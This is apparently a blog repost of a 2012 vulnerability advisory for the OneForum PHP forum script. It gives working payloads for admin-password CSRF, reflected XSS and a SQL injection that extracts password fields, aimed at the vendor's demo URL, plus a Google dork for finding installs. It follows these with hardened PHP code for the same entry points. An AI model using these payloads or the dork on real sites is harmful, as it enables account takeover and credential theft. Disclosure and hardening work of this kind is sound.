OneForum Multiple Vulnerabilities

SQL injection and XSS vulnerabilities were found in the OneForum script. The description of the vulnerabilities is as follows:

########################################## 
# Exploit Title: OneForum Multiple Vulnerabilities 
# Date: 2012-10-29 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onescripts.de/download/oneforum_en.zip 
# Category: webapps/php 
# Version: 2.0->3.0 
# Google dork: intext:"powered by OneScripts" 
########################################## 
 
[#] CSRF Change Admin Password: 
<html> 
<body> 
<form method="post" action="http://site/password.php?user_id=1" > 
<input name="password" type="text" value="passw0rd"> 
<input type="submit" name="submit" value="change password" > 
</form> 
</body> 
</html> 
 
[#] XSS 
http://localhost/category.php?id=<script>alert(0)</script> 
 
[#] SQL Injection: 
http://localhost/category.php?id=SQL 
Demo-> http://www.onescripts.de/demo/OneForum_en/category.php?id=2 UNION SELECT 1,user_pass,3 from users-- 
 
http://localhost/OneForum/topic.php?id= 
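The three entry points above (integer id in category.php, reflected id, and the unauthenticated password change in password.php) written the way a maintainer would harden them, as an added example that is not OneForum's or the advisory author's code; the table and column names (categories, users, user_id, user_pass) and the use of PDO with PHP sessions are assumptions:

```php
<?php
// Added example, not OneForum's own code: hardened versions of the handlers the
// advisory targets (category.php?id and password.php). Table/column names
// (categories, users, user_pass, user_id) are assumptions.
declare(strict_types=1);
session_start();
$pdo = new PDO('mysql:host=localhost;dbname=oneforum', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// category.php: id must be a positive integer; anything else is rejected before
// it reaches SQL or HTML, so "2 UNION SELECT ..." and "<script>" never get there.
function loadCategory(PDO $pdo, mixed $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, name FROM categories WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Anything reflected into the page (including an error message that echoes the
// requested id) goes through output encoding.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// password.php: require a per-session CSRF token and change only the logged-in
// user's own password, never one selected by a user_id in the query string.
function csrfToken(): string
{
    $_SESSION['csrf'] ??= bin2hex(random_bytes(32));
    return $_SESSION['csrf'];
}
function changePassword(PDO $pdo, array $post): bool
{
    if (!isset($_SESSION['user_id'], $post['csrf'], $post['password'])
        || !hash_equals($_SESSION['csrf'], (string) $post['csrf'])) {
        http_response_code(403);
        return false;
    }
    $hash = password_hash($post['password'], PASSWORD_DEFAULT);
    $stmt = $pdo->prepare('UPDATE users SET user_pass = :hash WHERE user_id = :uid');
    return $stmt->execute([':hash' => $hash, ':uid' => $_SESSION['user_id']]);
}
```

The password form would embed `csrfToken()` in a hidden field so that a form hosted on another site, like the one in the advisory, cannot supply a valid token.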

One comment

  1. Liberal Cabrera Raya said:

    This is very intriguing, You are a quite skilled blogger. I have joined your rss feed and look forward to looking for far more of your wonderful post. Also, I’ve shared your internet web site in my social networks!
